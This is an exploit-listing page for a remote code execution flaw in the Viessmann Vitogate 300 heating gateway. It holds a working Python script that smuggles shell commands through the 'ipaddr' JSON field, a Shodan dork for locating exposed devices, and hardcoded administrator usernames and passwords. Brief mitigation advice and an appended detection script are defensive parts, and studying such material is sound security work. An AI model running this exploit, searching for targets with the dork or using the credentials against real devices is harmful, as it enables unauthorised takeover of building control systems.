Viessmann Vitogate 300 - exploit.company
vendor: Vitogate 300
by: ByteHunter
CVSS: 6.1 (HIGH)
Remote Code Execution (RCE)
CWE: 78
Product Name: Vitogate 300
Affected Version From: Up to 2.1.3.0
Affected Version To: 2.1.3.0
Patch Exists: NO
Related CWE: CVE-2023-5702 & CVE-2023-5222
CPE: a:viessmann:vitogate:2.1.3.0
Platforms Tested:
2023

Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)

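The Viessmann Vitogate 300, in versions up to 2.1.3.0, is vulnerable to remote code execution. By sending a crafted request to the target device, an attacker can execute arbitrary commands on the system. In the script below, the command travels after a ";" in the "ipaddr" parameter of a JSON POST to /cgi-bin/vitogate.cgi, which is the pattern of OS command injection (the page lists CWE 78). The CVE identifiers given for this issue are CVE-2023-5702 and CVE-2023-5222.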

Mitigation:

Update to version 2.1.4.0 or later to mitigate this vulnerability. Additionally, restrict network access to the device to trusted sources only.

Exploit-DB raw data:

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    banner = """
    ╔═══════════════════════════════════╗
             CVE-2023-5702   
           Vitogate 300 RCE
           Author: ByteHunter      
    ╚═══════════════════════════════════╝
    """

    print(banner)


def send_post_request(target_ip, command, target_port):
    payload = {
        "method": "put",
        "form": "form-4-7",
        "session": "",
        "params": {
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    parser.add_argument("--target", required=False, help="Target IP address")
    parser.add_argument("--port", required=False, help="Target port",default="80")
    parser.add_argument("--command", required=False, help="Command")
    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    args = parser.parse_args()

    if args.creds:
        print("Vitogate 300 hardcoded administrative accounts credentials")
        print("Username: vitomaster, Password: viessmann1917")
        print("Username: vitogate, Password: viessmann")
    else:
        target_ip = args.target
        target_port = args.port
        command = args.command

        if not (target_ip and command):
            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
            return

        send_post_request(target_ip, command,target_port)

if __name__ == "__main__":
    banner()
    main()
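
A detection-side check for the request shape used by the script above, added here as an example (it is not part of the original Exploit-DB entry or of any Viessmann code): it flags POSTs to /cgi-bin/vitogate.cgi whose params.ipaddr is not a plain IP literal. The (method, path, body) record layout, the function names and the sample records are assumptions made for illustration.

```python
import ipaddress
import json

CGI_PATH = "/cgi-bin/vitogate.cgi"  # endpoint named in the script above


def ipaddr_is_suspicious(value):
    """True when value is anything other than a plain IPv4/IPv6 literal."""
    if not isinstance(value, str):
        return True
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return True
    return False


def inspect_request(method, path, body):
    """Return a finding string for a suspicious request, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0] != CGI_PATH:
        return None
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return None
    params = doc.get("params") if isinstance(doc, dict) else None
    if not isinstance(params, dict) or "ipaddr" not in params:
        return None
    if ipaddr_is_suspicious(params["ipaddr"]):
        return f"non-IP params.ipaddr (form={doc.get('form')!r}): {params['ipaddr']!r}"
    return None


def scan(records):
    """Return (index, finding) for every flagged record."""
    return [(i, f) for i, r in enumerate(records) if (f := inspect_request(*r))]


# Constructed sample records; the (method, path, body) layout is an assumption.
SAMPLES = [
    ("POST", CGI_PATH, '{"method":"put","form":"form-4-7","session":"","params":{"ipaddr":"192.168.1.10"}}'),
    ("POST", CGI_PATH, '{"method":"put","form":"form-4-7","session":"","params":{"ipaddr":"1;<command>"}}'),
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLES):
        print(f"record {idx}: {finding}")
```

The same allow-list test (accept only a parsed IP literal) can sit in a reverse proxy or WAF rule in front of devices that cannot yet be updated or isolated.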